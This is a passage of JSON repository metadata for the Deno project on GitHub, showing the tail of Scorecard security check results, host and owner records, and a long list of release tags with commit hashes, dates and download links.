out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html